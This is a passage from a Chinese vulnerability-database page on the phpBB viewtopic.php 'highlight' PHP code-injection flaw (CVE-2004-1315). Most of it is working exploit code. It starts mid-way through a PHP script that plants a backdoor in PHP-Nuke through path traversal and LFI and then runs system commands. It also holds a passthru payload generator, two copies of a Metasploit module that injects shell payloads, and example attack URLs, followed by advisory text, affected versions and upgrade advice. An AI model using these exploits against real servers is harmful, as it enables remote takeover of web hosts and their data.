            $http->postdata="xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";
            $http->send($attack_url."/admin.php");
            sleep(2);
            $http->postdata='';
            //Fire off a get request to trigger the uploaded php file using LFI
            $http->send($attack_url);
            sleep(2);
            //Try the LFI again, just in case.
            $http->send($attack_url."/admin.php");
        }
        sleep(2);
        //test if the backdoor works,  try and clean up after the exploit.
        $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
        if(strstr($test_backdoor,"31337")){
            print "Remote Code execution tested successfully:\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\n";
        }else{
            print "Backdoor install failed!\n";
        }
    }else{
        ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
        print "PHP-Nuke 7 detected.\n";
        $http->postdata="";//send get requests.
        //Fire off a check for CVE-2004-1315,  phpbb maybe installed. 
        //This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527
        //php-nuke was not vulnerable to this because of mainfile line 50: \([^>]*"?[^)]*\)
        //to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527
        $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
        //if the exploit didn't work,  then we might have to enable phpbb and populate it.
        if(!strstr($try_exploit,"20041315")){
            //Enalbe PHPBB
            $http->send($attack_url."/admin.php?op=module_status&mid=22&active=1");
            //create a new category for phpbb
            $http->postdata="mode=addcat&categoryname=test&addcategory=Create+new+category";
            $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php");
            //ipban.php
            sleep(2);
            //create a new form in the new category
            $http->postdata="forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";
            $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php?");
            $http->postdata="forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";
            $http->send($attack_url."/modules/Forums/admin/admin_forums.php?");
            //create a new topic in the new form
            $http->postdata="username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";
            $http->send($attack_url."/modules.php?name=Forums&file=posting");
            //ipban.php
            sleep(2);
            //access the first topic.
            $http->postdata="";
            //Check to see if any of the first 10 topics are exploitable.
            for($t=1;$t<10&&!strstr($try_exploit,"20041315");$t++){
                //Fire off a check for CVE-2004-1315.
               $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=".$t."&highlight=%2527.printf%252820041315%2529.%2527");
            }
        }
        //Check if we where able to hit CVE-2004-1315.
        if(strstr($try_exploit,"20041315")){
            print("Remote Code execution tested successfully:\n".$attack_url."/modules.php?name=Forums&file=viewtopic&t=".--$t."&highlight=%2527.phpinfo%2528%2529.%2527\nThis is a Doulbe urlencode()\n");
        }else{
            print("Remote code execution has failed!\n");
        }
    }
}
main();
?>
		

- 漏洞信息 (24274)

phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability (EDBID:24274)
php webapps
2004-07-12 Verified
0 sasan hezarkhani
N/A [点击下载]
source: http://www.securityfocus.com/bid/10701/info

The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to construct dynamically generated web pages.

Exploiting this issue may allow a remote attacker to execute arbitrary commands in the context of the webserver that is hosting the vulnerable software. 

<?
$rush='ls -al'; //do what
$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch

print "?t=%37&rush=";

for ($i=0; $i<strlen($rush); ++$i) {
 print '%' . bin2hex(substr($rush,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
 prt '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>

		

- 漏洞信息 (F84528)

phpBB viewtopic.php Arbitrary Code Execution (PacketStormID:F84528)
2009-12-31 00:00:00
H D Moore,Val Smith,Patrick Webster  metasploit.com
exploit,arbitrary,php,code execution
CVE-2005-2086,CVE-2004-1315
[点击下载]

This Metasploit module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace().

##
# $Id: phpbb_highlight.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'phpBB viewtopic.php Arbitrary Code Execution',
			'Description'    => %q{
					This module exploits two arbitrary PHP code execution flaws in the
					phpBB forum system. The problem is that the 'highlight' parameter
					in the 'viewtopic.php' script is not verified properly and will
					allow an attacker to inject arbitrary code via preg_replace().
			},
			'Author'         => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2005-2086'],
					[ 'CVE', '2004-1315'],
					[ 'OSVDB', '11719'],
					[ 'OSVDB', '17613'],
					[ 'BID', '14086'],
					[ 'BID', '10701'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => 
				[
					[ 'Automatic', 		{ }],
					[ 'phpbb <=2.0.10', 	{ }],
					[ 'phpbb <=2.0.15', 	{ }],
				],
			'DisclosureDate' => 'Nov 12 2004',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
					OptString.new('TOPIC', [false, "The ID of a valid topic"]),
				], self.class)
	end

	def find_topic

		1.upto(32) do |x|

		res = send_request_raw({
			'uri'	=> datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
		}, 25)

		if (res and res.body.match(/class="postdetails"/))
			print_status("Discovered valid topic ID: #{x}")
			return x
		end

		end
		return false

	end

	def exploit

		topic = datastore['TOPIC'] || find_topic

		if !(topic)
			print_status("No valid topic ID found, please specify the TOPIC option.")
			return
		else

			sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="

			case target.name
			when /Automatic/
				req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"

				res = send_request_raw({
				'uri'	=> datastore['URI'] + req
				}, 25)

				print_status("Trying to determine which attack method to use...")

				if (res and res.body =~ /\<title>phpinfo/)
					byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
					sploit << "%2527%252epassthru(#{byte})%252e%2527"
				else
					byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
					sploit << "%27.passthru(#{byte}).%27"
				end

			when /2\.0\.10/
				byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
				sploit << "%2527%252epassthru(#{byte})%252e%2527"
			when /2\.0\.15/
				byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
				sploit << "%27.passthru(#{byte}).%27"
			end

			res = send_request_raw({
			'uri'	=> sploit
			}, 25)

		end

	end

end
    

- 漏洞信息 (F82367)

phpBB viewtopic.php Arbitrary Code Execution (PacketStormID:F82367)
2009-10-30 00:00:00
Val Smith  
exploit,arbitrary,php,code execution
CVE-2005-2086,CVE-2004-1315
[点击下载]

This Metasploit module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace().

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'phpBB viewtopic.php Arbitrary Code Execution',
			'Description'    => %q{
					This module exploits two arbitrary PHP code execution flaws in the
					phpBB forum system. The problem is that the 'highlight' parameter
					in the 'viewtopic.php' script is not verified properly and will
					allow an attacker to inject arbitrary code via preg_replace().
			},
			'Author'         => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2086'],
					[ 'CVE', '2004-1315'],
					[ 'OSVDB', '11719'],
					[ 'OSVDB', '17613'],
					[ 'BID', '14086'],
					[ 'BID', '10701'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => 
				[
					[ 'Automatic', 		{ }],
					[ 'phpbb <=2.0.10', 	{ }],
					[ 'phpbb <=2.0.15', 	{ }],
				],
			'DisclosureDate' => 'Nov 12 2004',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
					OptString.new('TOPIC', [false, "The ID of a valid topic"]),
				], self.class)
	end

	def find_topic

		1.upto(32) do |x|

		res = send_request_raw({
			'uri'	=> datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
		}, 25)

		if (res and res.body.match(/class="postdetails"/))
			print_status("Discovered valid topic ID: #{x}")
			return x
		end

		end
		return false

	end

	def exploit

		topic = datastore['TOPIC'] || find_topic

		if !(topic)
			print_status("No valid topic ID found, please specify the TOPIC option.")
			return
		else

			sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="

			case target.name
			when /Automatic/
				req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"

				res = send_request_raw({
				'uri'	=> datastore['URI'] + req
				}, 25)

				print_status("Trying to determine which attack method to use...")

				if (res and res.body =~ /\<title>phpinfo/)
					byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
					sploit << "%2527%252epassthru(#{byte})%252e%2527"
				else
					byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
					sploit << "%27.passthru(#{byte}).%27"
				end

			when /2\.0\.10/
				byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
				sploit << "%2527%252epassthru(#{byte})%252e%2527"
			when /2\.0\.15/
				byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
				sploit << "%27.passthru(#{byte}).%27"
			end

			res = send_request_raw({
			'uri'	=> sploit
			}, 25)

		end

	end

end

    

- 漏洞信息

11719
phpBB viewtopic.php highlight Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

phpBB contains a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- 时间线

2004-11-12 Unknow
2004-11-12 Unknow

- 解决方案

Upgrade to version 2.0.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

phpBB Viewtopic.PHP PHP Script Injection Vulnerability
Input Validation Error 10701
Yes No
2004-07-12 12:00:00 2010-05-05 08:52:00
Discovery of this vulnerability is credited to sasan hezarkhani <gootiker@gmail.com>.

- 受影响的程序版本

PNphpBB PNphpBB 1.2 g
PNphpBB PNphpBB 1.2 f
PNphpBB PNphpBB 1.2
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7 a
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0 RC4
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC3
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC2
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 Beta 1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 1.4.4
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 1.4.2
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4 .0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2 .0
phpBB Group phpBB 1.0 .0
PHP-Nuke PHP-Nuke 7.9
PHP-Nuke PHP-Nuke 7.8
PHP-Nuke PHP-Nuke 7.7
PHP-Nuke PHP-Nuke 7.6
PHP-Nuke PHP-Nuke 7.5
PHP-Nuke PHP-Nuke 7.4
PHP-Nuke PHP-Nuke 7.3
PHP-Nuke PHP-Nuke 7.2
PHP-Nuke PHP-Nuke 7.1
PHP-Nuke PHP-Nuke 7.0
Gentoo Linux
phpBB Group phpBB 2.0.11

- 不受影响的程序版本

phpBB Group phpBB 2.0.11

- 漏洞讨论

The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to construct dynamically generated web pages.

Exploiting this issue may allow a remote attacker to execute arbitrary commands in the context of the webserver that is hosting the vulnerable software.

- 漏洞利用

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following example is available:

http://www.example.com/forums/viewtopic.php?t=[NUMBER HERE]&amp;highlight=Bug,SELECT * FROM $table
http://www.example.com/viewtopic.php?t=29040&amp;highlight=%2527%252esystem(chr(108)%252echr(115))%252e%2527

The following exploits are also available:

- 解决方案

The vendor has released an update to address this vulnerability. Please see the references for more information.


phpBB Group phpBB 1.0 .0

phpBB Group phpBB 1.2 .0

phpBB Group phpBB 1.2.1

phpBB Group phpBB 1.4 .0

phpBB Group phpBB 1.4.1

phpBB Group phpBB 1.4.2

phpBB Group phpBB 1.4.4

phpBB Group phpBB 2.0 RC3

phpBB Group phpBB 2.0 RC2

phpBB Group phpBB 2.0 .0

phpBB Group phpBB 2.0 RC1

phpBB Group phpBB 2.0 RC4

phpBB Group phpBB 2.0 Beta 1

phpBB Group phpBB 2.0.1

phpBB Group phpBB 2.0.2

phpBB Group phpBB 2.0.3

phpBB Group phpBB 2.0.4

phpBB Group phpBB 2.0.5

phpBB Group phpBB 2.0.6

phpBB Group phpBB 2.0.6 d

phpBB Group phpBB 2.0.6 c

phpBB Group phpBB 2.0.7

phpBB Group phpBB 2.0.7 a

phpBB Group phpBB 2.0.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站